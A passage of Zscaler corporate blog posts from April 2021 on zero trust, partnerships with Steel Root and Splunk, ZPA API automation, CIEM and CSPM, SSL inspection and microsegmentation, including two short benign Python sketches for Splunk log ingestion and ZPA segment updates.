DoD contracts, but the DoD will also leverage third-party assessments and certifications to ensure these requirements are being met. This contrasts with the status quo, in which contractors are expected to protect CUI of their own accord, meeting their own internal compliance standards. Steel Root, a leading cybersecurity services firm specializing in compliance for the U.S.
Defense Industrial Base, and Zscaler recently announced a partnership to help defense contractors prepare for CMMC certification. Commenting on this partnership, Steel Root Managing Partner Mike Nestor says, “Zscaler is a disruptive force in cloud-based security and has been validated year over year as the only leader in Gartner’s Magic Quadrant for Secure Web Gateways.” He continued, “When the FedRAMP authorization for Zscaler Internet Access was announced in 2020, we immediately recognized the solution as a required component in the cloud-native systems we design and implement. It’s the only zero trust secure access solution in the market that can meet our clients’ compliance requirements.” As the only SASE solution provider to meet the defense industry's most stringent security requirements (FIPS 140-2 validated cryptography and FedRAMP authorization for cloud services), Zscaler is focused on bringing the most secure cloud-based security services to DoD organizations and the larger defense industrial base community. Steel Root understands the importance of a cloud-first, future-ready strategy and provides highly effective guidance and implementation services supporting defense contractors as they prepare for CMMC, which is why our partnership with Steel Root furthers our commitment to helping federal organizations improve their cybersecurity posture. As DoD contractors proactively consider how their organizations can achieve the highest level of cloud accreditation through CMMC, they should look to leverage cloud security platforms that have already achieved FedRAMP-High authorization, such as Zscaler’s FedRAMP-High Zero Trust Exchange. Together, Zscaler and Steel Root provide both guidance and implementation services for defense contractors as they prepare for CMMC. As a result, contractors can focus on supporting DoD missions, and together, the defense community can take steps forward to mature cyber defenses.
Mon, 26 Apr 2021 08:00:01 -0700 Drew Schnabel Achieve True Zero Trust with Zscaler and Splunk Zscaler is proud to announce our zero trust partnership with Splunk, giving security analysts more ways to incorporate telemetry from our world-class Zero Trust Exchange into their workflows and strategies. Together, our tightly integrated, best-of-breed cloud security and security analytics platforms deliver unmatched zero trust capabilities for the modern, cloud-first enterprise. Zero trust is based on the notion that a breach is inevitable or has likely already occurred, and therefore any and all access to resources should be limited to the least amount users need to do their jobs. This involves segmentation, risk-based access controls, continuous authentication and monitoring, and dynamic coordination between security controls. As the National Security Agency (NSA) advises, “to be fully effective to minimize risk and enable robust and timely responses, zero trust principles and concepts must permeate most aspects of the network and its operations ecosystem.” Zscaler and Splunk work together to do just that. Zscaler’s cloud-native proxy architecture eliminates unnecessary exposure and provides rich data and increased visibility for the SecOps team. With a direct-to-cloud architecture, security teams can ensure that policy is being applied across every transaction; meanwhile, they get boosted insight into users, data, and apps.
The zero trust benefits of Zscaler include: Zero attack surface – apps are never exposed to the internet; you can’t attack what you can’t see Direct connections to an app, not a network – a segment of one, with no exposure of any additional resources or data and no ability to move laterally or connect to C&C servers Proxy architecture, not pass-through – full content inspection including SSL; holds and inspects unknown files before they reach the endpoint Multi-tenant architecture – cloud-native, multi-tenant design; continuous security updates Secure Access Service Edge (SASE) – policy enforced at the edge in 150 DCs, peering in internet exchanges, hundreds of apps Splunk, meanwhile, provides SecOps teams with centralized log ingestion and analytics to monitor and correlate activities across the entire security environment – including direct cloud-to-cloud streaming ingestion of Zscaler logs and dashboards – and provides visibility into zero trust with a zero trust analytics dashboard. Further, Splunk Phantom can orchestrate policy, whitelisting/blacklisting, and remediation actions using Zscaler’s API.
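On the ingestion side, Splunk’s HTTP Event Collector (HEC) is the standard entry point for this kind of cloud-to-cloud log delivery. Here is a minimal sketch of what a single forwarded log event looks like; the host, token, sourcetype, and event fields are illustrative placeholders, not the documented Zscaler–Splunk integration:

```python
import json

# Sketch: shape of a Zscaler web-log event POSTed to Splunk's HTTP Event
# Collector. The "Authorization: Splunk <token>" header and the
# /services/collector/event endpoint are standard HEC; the host, token,
# sourcetype, and event fields below are placeholder assumptions.

HEC_URL = "https://splunk.example.com:8088/services/collector/event"
HEC_TOKEN = "00000000-0000-0000-0000-000000000000"  # placeholder token

def build_hec_request(event: dict, sourcetype: str = "zscalernss-web"):
    """Return the (headers, body) pair for a single HEC event POST."""
    headers = {
        "Authorization": f"Splunk {HEC_TOKEN}",
        "Content-Type": "application/json",
    }
    body = json.dumps({
        "sourcetype": sourcetype,  # tells Splunk how to parse the record
        "event": event,            # the raw log record itself
    })
    return headers, body

headers, body = build_hec_request(
    {"user": "jdoe@example.com", "url": "example.com", "action": "blocked"}
)
# A real sender would POST `body` to HEC_URL with these headers, e.g. via
# urllib.request; with Cloud NSS, Zscaler performs this delivery for you.
```

The point of the sketch is the "no middleware" property: one authenticated HTTPS POST per batch of events, with no syslog relay or log-forwarder appliance in between.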
Splunk delivers: Logging, normalization, correlation, and enrichment of data from your entire security infrastructure in Splunk, including direct cloud-to-cloud streaming ingestion of Zscaler logs and dashboards Robust analytics, including Risk-Based Alerting (RBA) and User and Entity Behavior Analytics (UEBA), to identify suspicious/malicious behaviors A centralized single pane of glass to remediate incidents Zero trust analytics dashboards that incorporate data from multiple sources, including Zscaler, to provide end-to-end visibility Automation and orchestration of triage, investigation, and response to stop threat actors before they can do damage Centralized security controls and policy management, which can be used to enact changes to the Zscaler platform in addition to other tools Accelerate time-to-value with Cloud NSS log streaming Cloud NSS is Zscaler's innovative new cloud-to-cloud data streaming service that makes it even faster and easier to deploy, manage, and scale log ingestion from Zscaler to Splunk Cloud. This service enables native ingestion of Zscaler’s rich cloud security telemetry to enrich investigation and threat hunting for cloud-first organizations – and is configurable in a matter of clicks. Splunk Cloud correlates the Zscaler telemetry with an organization’s other high-value data sources, providing full visibility into actionable data for investigations within one centralized console. Zscaler’s cloud-native security architecture dramatically reduces the attack surface, provides full inline scanning and analytics, and sends high-resolution telemetry logs directly to Splunk using the cloud-to-cloud log streaming service. The Zscaler app for Splunk further allows SecOps teams to visualize Zscaler’s threat protection with detailed dashboards and prebuilt queries. Customers benefit from: Fast, reliable integration: Get immediate visibility with pre-built integrations.
Splunk and Zscaler work together seamlessly, with high-resolution telemetry data normalized and ingested directly into Splunk. Increase reliability and scalability by sending all logs directly to Splunk via the Splunk HTTP Event Collector with no middleware. Simplified Management: No additional appliances to manage for logging. Direct cloud-to-cloud integration is managed by Zscaler and Splunk. Let your analysts spend more time on preventing, investigating, and mitigating threats and less time on administering logging pipelines. We are extremely excited to offer our customers the benefits of this partnership with Splunk, and we look forward to continued collaboration on zero trust. To learn more, check out the Zscaler + Splunk solution brief. If you're already a Zscaler and Splunk customer, download the Zscaler App for Splunk from Splunkbase today. Mon, 26 Apr 2021 09:00:01 -0700 Mark Brozek Best-selling Author Ben Mezrich Joins Zenith Live as Keynote Speaker Zenith Live, the world’s largest cloud transformation conference, is right around the corner—but that hasn’t stopped us from adding to our impressive list of executive and future-forward keynote speakers. Today, we’re excited to announce our latest addition to this year’s event: Ben Mezrich. In his keynote, An Interview with Ben Mezrich: A Glimpse Inside the Rise of Bitcoin and the Modern Tech World, Mezrich will walk through the story behind his latest book, Bitcoin Billionaires, while sharing his unique view on the future of cryptocurrency, the world’s economic future, and, of course, the real story behind the infamous Winklevoss brothers—the world’s first Bitcoin billionaires. From the twins’ falling-out with Mark Zuckerberg, to a beach in Ibiza, to the emergence of the Silk Road—and subsequent SEC hearings—Bitcoin Billionaires exposes the true story behind the brothers’ attempts at redemption and revenge in the wake of their epic legal battle with Facebook.
Not only is this story wildly entertaining, but Mezrich also uses it as a springboard to comment on the future of currency and digital economics, weaving together the complexities of emerging technology and humanity. Mezrich will recount this story and share his perspective on the ways that cloud computing is reshaping the world as we know it—all in a candid interview with Zscaler CMO Chris Kozup at Zenith Live. You won’t want to miss this! Here’s how to register. What you can expect at Zenith Live 21 Zenith Live is a virtual conference focused on secure digital transformation, showcasing what’s possible with the flexibility of true zero trust. With over fifty breakout sessions across six tracks, hands-on training, executive forums, and architecture workshops, Zenith Live is designed to show IT leaders across all disciplines how to lead an organization securely into the modern era, where you can innovate faster, reduce risk, and work smarter—all at the speed of cloud. In addition to Mezrich’s keynote, here’s what else you can expect at this year’s event: Expert speakers Hear visionary predictions for the future of the digital world and how CIO, CTO, and CISO pioneers from Fortune 500 companies successfully enacted their secure digital transformation initiatives. In-depth breakout sessions Select from over 50 sessions in six tracks: Foundations Zscaler Expert CloudOps/DevSecOps Network Professional Security Professional Public Sector Architecture Workshops Zscaler experts teach an interactive session on how a zero trust architecture can free you from past constraints so you can move securely to the digital future—at cloud speed. Women in IT Exchange A fireside chat with IT leaders on professional direction and practical approaches to breaking down the barriers to individual success. Live Q&A/Demos Zscaler professionals lead hands-on interactive training sessions on Zscaler’s Zero Trust Exchange Technology.
Training Zscaler cloud operations and cybersecurity experts will lead detailed hands-on technical training and certification programs. Register now for this one-of-a-kind, two-day immersive experience. Wed, 21 Apr 2021 20:31:25 -0700 Jessica Hofmann Announcing REvolutionaries, the Revolutionary New CXO Community, and the Zero Trust Academy Digital transformation requires zero trust. But successfully adopting zero trust requires not only getting the right platform but driving the entire organization to adopt a new cultural mindset. Roadmaps must be shared, business and IT priorities must align, and silos must be torn down. The new CXO must be both an innovator and a strategist, applying technology and architecture to drive measurable outcomes for the business. The Customer Experience and Transformation team at Zscaler comprises former CIOs, CISOs, CTOs, and heads of network, security, and architecture from prominent global organizations. These former practitioners bring their own real-world zero trust experience and expertise to their roles. They partner closely with Zscaler customer CXOs and future customers who are embarking on their own digital transformation journeys. Today, I'm proud to announce the launch of two key programs, The Zero Trust Academy and the REvolutionaries CXO Community. First, we all share a collective mission to advance the skills of the security-practitioner community. To that end, Zscaler has created the Zero Trust Academy, a certification training program focused on securing connectivity to private apps, SaaS applications, and the internet with the Zscaler Zero Trust Exchange. Second, digital transformation requires buy-in from and deep engagement with the C-suite and IT leadership. To empower, foster, and connect these leaders, we’re launching the Zscaler REvolutionaries Community. Zero Trust REvolutionaries are true pioneers. 
The REvolutionaries forum brings together visionary tech leaders to showcase zero trust success stories, share digital transformation best practices, participate in CXO-driven industry events, and connect with like-minded innovators. Featured media will include practical and actionable thought leadership content, industry case studies, news, and the latest cybersecurity research from the Zscaler ThreatLabZ team. By highlighting successful thought leadership, events, insights, and community, we can help other enterprise leaders, we can push forward new technology architectures that will allow businesses to excel at their mission, and we can set standards for a new digital future that lives securely in the cloud. It's time to seize the zero trust moment. Join me and the other CXO REvolutionaries. Tue, 20 Apr 2021 05:00:01 -0700 Kavitha Mariappan Simplifying Security: Automation is the Way Forward with ZPA Network engineers looking to automate processes for private applications: look no further. Zscaler Private Access (ZPA) now has API capabilities to help manage and operate secure access to private applications, eliminating the need for manual intervention and thus saving resources and removing the possibility of human error in the process. Whether you are part of a large enterprise or are looking to implement large-scale deployment projects, automation is key. Many projects handled by IT teams demand dynamic changes and quick action, potentially disrupting project flow. Having an automated process to manage these rapid changes can help create a more efficient environment for the DevOps team, security engineers, and network engineers. ZPA APIs: Simplifying security through automation ZPA APIs are designed to help streamline the app discovery process. Coupled with segmentation, ZPA APIs make it easy to scale secure access to private applications, keeping security and the end-user experience intact.
ZPA APIs automatically create policies for newly discovered services and revoke access for users based on predetermined settings. We have also introduced machine learning capabilities that allow for auto-segmentation of application workloads, simplifying the adoption and continuity of zero trust. Automated workflow Automation is key to achieving consistency and avoiding redundant tasks. ZPA APIs can help create application segments and automatically add specific applications to existing segments, reducing your involvement in repetitive tasks and simplifying the entire application segmentation process. When IT teams are required to lock down network routers or switches based on port access, ZPA APIs assist in defining and segmenting applications. Using APIs for this process allows granular policy definition without requiring involvement every time a new router or switch is provisioned. Adapting to a dynamic workload environment IT teams need to launch and terminate cloud instances in AWS or Azure for testing purposes or to utilize allotted spot instances. In a dynamic environment, manually updating policies is almost impossible to manage. ZPA APIs automate policy updates for your constantly changing environments without the need for you to define wildcards in the ZPA dashboard. Reduce the chance of error ZPA can discover applications in your network using specific domain names and IP subnets. Adding these applications to app segments is currently possible using the ZPA dashboard. With the ZPA API, these discovered apps are extracted and added to existing application segments using a script, without requiring you to add them one by one. In addition, new app segments can be defined with granular access policies through the scripts, resulting in automation that reduces human error. Streamline and standardize processes In addition to saving resources, time, effort, and money, ZPA APIs standardize processes, thereby increasing scalability.
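As an illustration of the kind of script this enables, the sketch below merges a batch of discovered application FQDNs into an existing application segment in one call instead of adding them one by one in the dashboard. The base URL, endpoint path, and payload field names are assumptions for illustration only, not the documented ZPA API surface:

```python
import json

# Illustrative sketch: fold newly discovered app FQDNs into an existing ZPA
# application segment with a single update. The base URL, endpoint path, and
# payload fields ("domainNames", "id") are hypothetical placeholders standing
# in for whatever the real ZPA API defines.

BASE = "https://config.private.zscaler.com/mgmtconfig/v1/admin/customers/{cid}"

def build_segment_update(customer_id, segment, discovered_fqdns):
    """Merge discovered FQDNs into a segment; return (url, json_payload)."""
    # Deduplicate against apps already in the segment, keep a stable order.
    merged = sorted(set(segment["domainNames"]) | set(discovered_fqdns))
    payload = dict(segment, domainNames=merged)  # copy; original unchanged
    url = BASE.format(cid=customer_id) + f"/application/{segment['id']}"
    return url, json.dumps(payload)

segment = {"id": "216196", "name": "crm-apps",
           "domainNames": ["crm.internal.example.com"]}
url, payload = build_segment_update(
    "9999", segment,
    ["billing.internal.example.com", "crm.internal.example.com"])
# A real script would PUT `payload` to `url` with a bearer token obtained
# from the ZPA authentication endpoint.
```

The design point is the one the post makes: the merge-and-update logic is a pure, repeatable function, so the same script behaves identically whether it adds two discovered apps or two hundred, removing the per-app manual step where errors creep in.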
Organizations work with hundreds of applications and/or application segments. ZPA APIs make repeatable work easy to handle. To learn more about Zscaler Private Access and the new APIs, watch this video. To hear from Zscaler experts on how ZPA APIs can benefit your organization, request a demo. Additional Capabilities: The Zscaler Private Access (ZPA) API gives you programmatic access to manage the following ZPA features: Application Segments Segment Groups Application Servers Server Groups Access Policies Client Forwarding Policies Timeout Policies Tue, 20 Apr 2021 05:00:01 -0700 Kanishka Pandit CIEM vs. CSPM: Which is Better for Reducing Public Cloud Risk? The vast majority of public cloud security incidents are the customer’s own fault. Most prominent among these has been the huge number of AWS S3 bucket exposures over the last several years, with big names like Verizon, Accenture, the Republican National Committee, and even the Pentagon falling victim. While these incidents might have gotten an inordinate amount of press coverage, they are far from the only type of issue causing security incidents in the public cloud. From a macro standpoint, these issues fall under two categories: misconfigurations and excessive permissions. Two new categories of tools, Cloud Security Posture Management (CSPM) and Cloud Infrastructure Entitlement Management (CIEM), have emerged to solve these challenges. The question is, which technology will better help you reduce risk while embracing public cloud? Reducing public cloud misconfigurations CSPM tools are built to solve public cloud misconfiguration issues, such as the aforementioned AWS S3 bucket exposures. Across the big three cloud providers, Microsoft Azure offers more than 600 distinct services, AWS more than 200, and GCP more than 100. Each of these services has configuration options that impact security and risk, and they are evolving very rapidly.
With most organizations now adopting a multicloud strategy, there are thousands of feature configurations for infosec teams to monitor. CSPM tools help organizations monitor and prioritize configuration issues across their public cloud environments, addressing both security and compliance requirements. These tools inventory everything running across multicloud deployments, calculate security posture across hundreds of services, use risk to prioritize issues, automatically remediate, and then enforce guardrails to ensure ongoing compliance. Addressing excessive public cloud permissions CIEM is a newer category than CSPM, built to address security gaps left by CSPM tools that focus exclusively on misconfigurations. These tools address the inadequate control over identities and privileges that has become prevalent in public cloud deployments. An organization with hundreds of cloud users and tens of thousands of resources will have tens of millions of individual entitlements to manage—this is far from a human-scale problem. CIEM helps organizations discover who can access what and how permissions are utilized across human and non-human identities, build and enforce a simple and transparent least-privileged permissions model, and implement a multicloud guardrail policy for entitlements. CSPM vs. CIEM: Which do you need? So, given the importance of these tools for reducing cloud risk, which do you need to deploy in your environment? The answer is both. Misconfigurations and excessive permissions are both major causes of public cloud security incidents that need to be addressed. Together, these products can minimize the vast majority of issues that have plagued cloud security to date. With our recent acquisition of Trustdome and their innovative CIEM platform, Zscaler has bundled CIEM and CSPM together as part of our comprehensive Zscaler Cloud Protection (ZCP) solution.
I’d encourage you to reach out to Zscaler to take a closer look at how we can help address the biggest sources of risk in your public cloud deployments. Thu, 22 Apr 2021 08:00:01 -0700 Rich Campagna The Advantage of Implicit DIStrust in Traffic Inspection Zero trust comes up in almost every conversation I have. It's definitely THE hot topic across the industry right now. And yet, I see confusion in terms of how, when, and where to get started with it. The National Institute of Standards and Technology (NIST) and other organizations have published guidance on it, and clear definitions of zero trust are starting to emerge. The good news is this means you don’t have to address everything all at once—you can choose one focus area at a time. Based on my career as a security professional, I think a good starting point is the concept of zero trust in the category of traffic inspection. How encrypted traffic is giving bad actors opportunity At Zscaler, we approach zero trust as a mindset centered around an implicit distrust of all traffic. Bad actors excel at exploiting vulnerabilities, and by inherently trusting no one, organizations have better control and can avoid cyberthreats and subsequent data compromise. In terms of traffic inspection, the share of internet traffic that is encrypted (HTTPS over port 443) has crept up steadily over a long period of time. Users and IT managers have come to implicitly trust SSL encryption, and organizations are looking at that encrypted traffic and saying, “I'm going to grant implicit trust to that SSL traffic and I'm going to allow it to pass through.” The problem is that encrypted traffic cannot be trusted: last year, 80 percent of all cloud traffic was SSL encrypted, and in the last six months of 2018 alone, Zscaler blocked 1.7 billion SSL threats. We see malicious actors taking advantage of the implicit trust people give SSL, using it as a threat vector into individual environments.
I don’t think any IT security professional is granting this implicit trust to SSL because they believe all that traffic is trustworthy. Rather, it's the fact that inspecting all of it is a monumental challenge for many organizations. Purchasing and managing a number of appliances to break and inspect all this traffic is a heavy lift. Why implicit distrust matters The oldest security game in the book is adversary and defender. It predates the digital age, going back to the days of cops and robbers. The bad guy identifies and exploits a vulnerability and then the security professionals, the good guys, patch and defend against that individual exploit. And then the bad guys find a new vulnerability because attackers are always going to excel at figuring out where vulnerabilities exist. Implicit trust of encrypted internet traffic is a vulnerability malicious actors use today to great effect, and they will continue to do so into the future. Zero implicit trust (or implicit distrust) is a solid counter to that strategy. For example, in an internal security program, there are URLs deemed as safe or unsafe for internet users. The addresses deemed safe are usually given implicit trust because the site is “safe.” Bad actors can spot this site specifically and commit a watering hole attack, plant malicious content, or create a redirect from a good node to a bad one. The bad actor places this traffic inside SSL over Port 443. Because it travels over HTTPS, it is encrypted, and bad actors understand that encrypted traffic enjoys a position of trust and rarely receives the same level of inspection as other traffic. The traffic is allowed through because it's coming from a known good node. And now the vulnerability has been exploited. In this case, the exploit infects the user. Even if the traffic goes into a sandbox, that doesn’t always prevent the attack.
Due to the cost and time, I often see traffic passed simultaneously as it's being detonated in the sandbox. That means the payload is hitting the target at the same time it’s being flagged as a malicious payload. At this point, the payload is on the target and malicious actors are taking malicious action. This can be anything from internal denial of service to destruction or modification of data to ransoming an internal owner’s data back to them. Does this mean that current security models and methods are bad? No, not at all. An antivirus engine, backed by a threat database and file-type static malware analysis, is a good, fast, and efficient way to go. However, I think many methods are being used inefficiently because they can only be as good as they are up to date. The fluid nature of the environment in which we all operate means our depth of protection is only as strong as our definitions are current. If we’re not updating them consistently, that's another vulnerability that malicious actors can use. Cyberattackers are rapidly changing their attacks and methods and coming at environments with different MD5 hashes, because if they can slip around hash-based detection, they can eventually get their payload to the target. How security works in a perfect world Dynamic malware analysis applies heuristics at the end of the analysis, a “good/bad” process, to perform a risk assessment against an individual piece of traffic. If it's deemed suspicious, it goes to a sandbox. In a perfect world, that sandbox blocks the file or piece of traffic from the user until it's determined whether that individual piece of traffic is good or bad. If it's good, it passes it to the user. If it's bad, the user never has the opportunity to interact with it. That payload is never delivered to the host. As soon as the traffic is determined to be malware and should be blocked, the definitions are updated.
How this works in an even more perfect world If I've discovered a zero-day file hash in that sandbox, I immediately want protection against it, right? Now, I could do that inside my own agency and my peers could do it inside their agencies. But what if I had access to a service where I could not only stop that malicious payload from landing on my host, but stop it for an entire group of users? And those users could do the same. Can I update definitions on my site based on collaboration and discovery of malicious content? Can I gain knowledge of the group dynamic in order to create clean and clear definitions across my enterprise and bank of users? In a perfect world, yes. This is how Zscaler works. Our definitions are updated constantly. We are always pulling from our own sources of data. There is no data known to be bad or malicious that we don’t include in our scan process. We have a method in place when analyzing traffic that allows us to say, “we don't have a definition specifically against this. There's not any MD5 hash to categorize the traffic, so we’ll take a look at it in the sandbox and see what happens.” When we determine an individual piece of traffic is bad, we go back and update those definitions. When that MD5 hash is seen again, we don't have to spend the time, cycles, and money sandboxing that individual piece of traffic, which can negatively impact the user experience. For example, we had a customer that had a piece of ransomware and an info stealer Trojan come through unflagged as good or bad because there were no definitions against this individual piece of traffic. However, based upon some analysis and heuristics we did, we determined it was suspicious. It went to the sandbox and was flagged as a problem. The malicious traffic was noted and repopulated back to the scan engines at the top.
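The cache-then-sandbox loop just described can be sketched as a verdict cache keyed by file hash. This is an illustrative sketch only, not Zscaler's implementation: the in-memory dictionary, the trivial byte-signature "sandbox," and all function names are assumptions.

```python
# Hedged sketch of the "cloud effect" flow described above: consult a shared
# verdict cache keyed by file hash, sandbox only unknown files, then publish
# the verdict so every subscriber blocks that hash instantly next time.
import hashlib

verdict_cache = {}  # file hash -> "good" | "bad", shared across subscribers

def detonate_in_sandbox(payload: bytes) -> str:
    """Stand-in for dynamic analysis; here, a trivial byte-signature check."""
    return "bad" if b"EVIL" in payload else "good"

def inspect(payload: bytes) -> str:
    digest = hashlib.md5(payload).hexdigest()  # the post describes MD5 lookups
    if digest in verdict_cache:
        return verdict_cache[digest]        # known hash: no sandbox cycle spent
    verdict = detonate_in_sandbox(payload)  # hold the file until the verdict
    verdict_cache[digest] = verdict         # update the shared definitions
    return verdict

inspect(b"EVIL dropper")  # first sighting: sandboxed and recorded as bad
inspect(b"EVIL dropper")  # repeat sighting: blocked straight from the cache
```

The point of the shared cache is the one the post makes: a hash detonated once, anywhere in the service, protects every subscriber without another sandbox cycle.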
The next time this traffic came through to this customer and to other customers subscribed to the service, the MD5 hash flagged it as known bad and immediately blocked it. We decrypt and inspect all SSL encrypted traffic against a long list of definitions that are as current as they can be. This level of implicit distrust is possible because, as a cloud service, we benefit from the cloud effect, and those databases are kept up to date. I'm able to have a detonation outside of the agency's data center and outside of the internal network, make a determination on the file, and that determination immediately strengthens my scanning process at the top. And that is zero implicit trust (or the advantage of implicit distrust). We can live in a perfect world with a mindset around applying zero trust to the traffic inspection model. Mon, 19 Apr 2021 09:00:01 -0700 Tom Tittermary Entitlements: The Most Overlooked Risk in the Public Cloud Understanding the threat vectors that introduce business risk is an important early step towards developing a strong cybersecurity strategy. The same is true as your organization embraces the public cloud. There are five key areas that can introduce risk when working with the public cloud, each of which must be understood and properly protected. Five key public cloud threat vectors Configuration – This is the realm of cloud security posture management (CSPM) tools. This is where you gain an understanding of the configuration of all of the services and resources in your cloud environments, the corresponding security posture, and misconfigurations that need to be remediated. External exposure – Anything that is exposed to the internet is a potential target for bad actors. But workloads need internet access as well as access to other clouds and to your traditional data centers. Understanding what can be attacked from the outside is absolutely critical.
Lateral movement – Even if you’ve appropriately configured all services and have minimized your exposed attack surface, there is still the possibility of someone or something getting in. Detecting and preventing bad actors from moving laterally across your public cloud footprint can help ensure that the impact of any breach is minimized. Crown jewel data and applications – Many organizations are migrating sensitive data and applications to the public cloud. Knowing where these crown jewel assets are and applying additional protections can help minimize the impact of a breach. Entitlements – The final piece of your public cloud attack surface is the one most commonly overlooked: entitlements and permissions. An organization with hundreds of cloud users and thousands of cloud resources will have hundreds of millions of discrete permissions granted. This may include unused permissions, non-federated dormant accounts, misconfigured permissions, and more. Cloud Infrastructure Entitlement Management The emerging category of products addressing the growing cloud permissions problem is known as Cloud Infrastructure Entitlement Management (CIEM). How big is this problem? According to Gartner, “by 2023, 75% of cloud security failures will result from inadequate management of identities, access, and privileges, up from 50% in 2020.”1 This is why we’re so excited to welcome Trustdome to the Zscaler family. Trustdome is an innovator in CIEM, providing permissions security across all cloud environments, while preserving DevOps’ freedom to innovate. The platform provides full governance over who has access to what across all your clouds, resources, identities, and APIs. You get a 360° view of all your permissions and the ability to automatically find misconfigurations and get remediation plans teams can act on, all from one unified platform. And with zero disruption to DevOps, they’re free to deploy code rapidly, freely, and securely.
Key use cases for CIEM include: Cloud permission governance – Discover who can access what and how permissions are utilized across human, machine, and external identities Least privileged configuration – Clean up unused, default, and misconfigured permissions, maintaining a simple and transparent permissions model Guardrail enforcement – Implement a unified cloud permissions guardrail policy across major cloud platforms including IaaS, PaaS, and SaaS The Trustdome product will become Zscaler CIEM, a critical element of Zscaler Cloud Protection (ZCP) services. ZCP simplifies and automates zero trust security for workloads on and between any cloud platform, providing comprehensive coverage for all five threat vectors of the public cloud. To learn more about Zscaler CIEM or to schedule a demo please connect with us directly. 1 Gartner, Managing Privileged Access in Cloud Infrastructure, June 9, 2020, ID G00720361 Forward-Looking Statements This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. These forward-looking statements include our intention to acquire Trustdome, the timing of when the acquisition will be completed and the expected benefits of the acquisition to Zscaler’s product offerings and to our customers. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. A significant number of factors could cause actual results to differ materially from statements made in this blog, including those factors related to our ability to successfully integrate Trustdome technology into our cloud platform and our ability to retain key employees of Trustdome after the acquisition. 
Additional risks and uncertainties are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on March 4, 2021, which is available on our website at and on the SEC's website at Any forward-looking statements in this blog are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler will not necessarily update the information, even if new information becomes available in the future. Thu, 15 Apr 2021 04:45:02 -0700 Rich Campagna Is Microsegmentation a Security Project or an Infrastructure Project? The desired effects of microsegmentation are clear. They include: Limiting the “blast radius” of a data center or cloud environment compromise Preventing lateral movement of threats within the environment (which often facilitates an attack) Supplying fine-grained controls to applications running in the environment (which prevent lateral movement) An effective microsegmentation project defines and analyzes the inherent characteristics of its workloads so that the IT organization can describe what each cloud/data center workload will manage (i.e., what type of data or applications), and how and by whom it will be used. This process allows the organization to accomplish granular segmentation through individual controls that are based on the nature of each workload. Though microsegmentation is an architectural model created to ensure security in the cloud or data center, its implementation and management are not as clear as its intended goals. For one thing, any impact on the network means that networking teams must be involved, and while microsegmentation that is based on software identity does not require any architectural changes, it does remove any excess pathways that are not used by the application. Therefore, any organization considering a microsegmentation project needs to decide who is involved and at what level.
The argument for infrastructure Network operations teams are responsible for network, data, and application management inside the organization's network environment. This responsibility is not abdicated when the networking occurs inside a third-party provider environment, in other words, in a public or private cloud. The challenges may be different, but the burden remains the same. Traditionally, networking teams define policies for routers and switches. In the cloud, where a physical boundary isn’t present, NetOps is still required to define rules and policies for how applications and services communicate, even when the tools and techniques differ. Under NetOps’ charge is asset inventory, policy configuration and ongoing management, and traffic analysis, among other things. Accompanying these responsibilities is a requirement to maintain network performance and uptime, whether the infrastructure is on-premises or virtual. It’s these latter two responsibilities that often put networking teams directly into conflict with security teams, and also why the oversight and implementation of microsegmentation projects can be controversial. Microsegmentation projects using traditional tools like firewalls and other address-based technologies are complex and costly. Some of the more common “headwinds” to starting or applying microsegmentation include: Translating network speak into application speak to apply effective policies Managing thousands of policies Managing different sets of policies for on-prem and cloud environments Understanding application dependencies The above bullet points fall under the authority of NetOps, even though SecOps will likely have to be involved.
The argument for security Microsegmentation was originally devised as a way to compensate for the vulnerability of flat and overly permissive networks by creating “microperimeters” around critical applications or collections of like data, such as “HR data” or “finance data.” Moving perimeters inside the network allows security practitioners to measure and reduce risk and conduct vulnerability assessments for the environment. These are clear security responsibilities. Similarly, the goals of microsegmentation listed in the bullet points at the top of this document fit squarely into security’s realm. There is, however, significant crossover between SecOps and NetOps. This has been the case ever since security became its own domain of expertise. Security is responsible for what happens when policies are applied to the environment, but networking is responsible for applying the rules. In today’s hyper-aware cyber-incident world, SecOps teams have become more heavily involved in creating and monitoring rules, but the fact remains that security teams will always favor the confidentiality and integrity of workloads over availability. NetOps is the exact opposite. Can’t we all just get along? Zero trust networking is the backbone of many microsegmentation projects, and ironically it’s zero trust that allows for speed and efficiency and optimal security. With least-privileged access at the heart of zero trust, cloud and data center workloads can communicate as intended and necessary while remaining protected. Microsegmentation facilitates cloud workload protection but also means that NetOps and SecOps must come together more closely than ever before to meet business objectives (not just IT and/or security objectives). Many microsegmentation projects fail because they’re too complex and costly, and because the network constructs on which controls are based often don’t work well in a virtual environment.
As a result, networking and security teams must work together to choose the tools and techniques best suited to implementation and management of microsegmentation. Contrary to industry lore, there is no one or “preferred” way to conduct a microsegmentation project, and few of these projects can be taken on wholesale by any organization. Though improved cybersecurity control—especially for cloud environments—was the intent behind microsegmentation, networks and networking teams will be affected in terms of resources and performance, understanding baselines, identifying and visualizing abnormal traffic and application flow patterns, and configuring and managing policies. Security teams will need to remain consistently involved with advising on policy refinements to reduce risk of exposure, detecting and responding to possible policy infringements and security incidents, and ensuring technologies and processes are compliant with cybersecurity best practices. OK, so maybe this quick blog post is a bit of a copout. Then again, at the foundation of cybersecurity is NetOps-SecOps collaboration and cooperation. Security grew out of networking, after all, and now as its own, much more complicated discipline, security teams cannot forget that the systems and data they’re charged with protecting are reliant upon good networking practices. Fri, 16 Apr 2021 08:00:01 -0700 Nagraj Seshadri Peanut Butter and Chocolate: Virtual Desktop Infrastructure and Zscaler’s Zero Trust Exchange go together like... Zscaler Private Access (ZPA) and Zscaler Internet Access (ZIA) complement each other to secure Virtual Desktop Infrastructure (VDI) solutions. Like peanut butter and chocolate: Two great things that are great together. A common question: Where should we replace our VDI with ZPA, and where should we leverage the combined solution? Peanut butter and chocolate might taste good when paired, but you can’t substitute one for the other. (Chocolate syrup on spring rolls? No.
